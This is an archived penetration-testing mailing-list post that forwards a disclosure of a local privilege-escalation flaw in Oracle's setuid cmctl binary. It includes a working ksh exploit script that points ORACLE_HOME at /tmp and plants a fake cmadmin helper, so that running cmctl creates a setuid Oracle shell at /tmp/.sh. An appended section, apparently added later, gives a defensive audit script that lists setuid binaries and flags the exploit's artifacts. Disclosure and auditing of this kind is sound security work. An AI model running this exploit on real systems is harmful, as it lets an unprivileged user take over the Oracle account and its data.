Penetration Testing mailing list archives
[PEN-TEST] Oracle cmctl exploit - addendum for BugTraq ID 170 (fwd)
From: Alfred Huger <ah () SECURITYFOCUS COM>
Date: Thu, 31 Aug 2000 11:13:14 -0700
Hey folks, this came into our Vulnerability Database today - I thought it might be relevant given our current thread on Oracle/SQL et al.

Alfred Huger
VP of Engineering
SecurityFocus.com

---------- Forwarded message ----------
Date: Thu, 31 Aug 2000 13:58:33 -0400
From: Kevin Wenchel <kevin.wenchel () jhuapl edu>
To: vuldb () securityfocus com
Subject: Oracle cmctl exploit - addendum for BugTraq ID 170

Just an addendum to ID 170 in the Bugtraq database. ID 170 lists several Oracle setuid executables that are "believed to contain security vulnerabilities", although no exploit info is given. Attached is an exploit I created recently for the "cmctl" command.

The Oracle cmctl command trusts the integrity of the ORACLE_HOME and ORA_HOME environment variables. When you run the command "cmctl start cmadmin", cmctl looks under $ORACLE_HOME\bin for an executable called "cmadmin" and runs it. By modifying $ORACLE_HOME you can have all sorts of fun with the Oracle account.

-Kevin
#! /usr/bin/ksh
#############################################
#
# cmctl is installed setuid to Oracle
# by default. See BugTraq ID 170 and Oracle
# bug id 701297 and 714293.
#
# This script will create a setuid Oracle shell,
# /tmp/.sh
#
# redirect environment variables
export ORACLE_HOME=/tmp
export ORAHOME=/tmp
mkdir /tmp/bin
chmod a+rx /tmp/bin
# create cmadmin script
cat <<EOF > /tmp/bin/cmadmin
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
chmod a+rx /tmp/.sh
EOF
chmod a+rx /tmp/bin/cmadmin
# run cmctl to create Oracle setuid shell
/oracle/products/V815/bin/cmctl start cmadmin
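
An added audit example, not part of the original post: it lists setuid/setgid binaries in a directory such as $ORACLE_HOME/bin, and flags in a scratch directory such as /tmp the two artifacts the script above creates. The function names and the SETID/HELPER labels are assumptions made for this example.

```shell
#!/bin/sh
# Added audit example (not from the original post). All directories are
# supplied by the caller; none are hard-coded.

# Print every setuid or setgid regular file under directory $1.
# Run against "$ORACLE_HOME/bin" to enumerate binaries like cmctl that
# execute with the Oracle account's privileges.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Scan a world-writable scratch directory $1 (for example /tmp) for the
# two artifacts the posted script leaves behind:
#   SETID  - a setuid/setgid file, such as the copied shell
#   HELPER - a file named cmadmin inside a bin/ directory, i.e. a fake
#            Oracle home that a redirected ORACLE_HOME would point at
audit_scratch() {
    list_setid "$1" | sed 's/^/SETID /'
    find "$1" -xdev -type f -path '*/bin/cmadmin' -print 2>/dev/null |
        sed 's/^/HELPER /'
}

# Return 0 only when none of the given scratch directories has a finding.
scratch_is_clean() {
    for dir in "$@"; do
        [ -z "$(audit_scratch "$dir")" ] || return 1
    done
    return 0
}

# Stand-alone use: sh audit.sh /tmp /var/tmp
if [ "$#" -gt 0 ]; then
    for dir in "$@"; do audit_scratch "$dir"; done
fi
```

Any setuid binary reported by list_setid that resolves helper programs through ORACLE_HOME is a candidate for having its setuid bit removed, which is the fix this class of bug calls for.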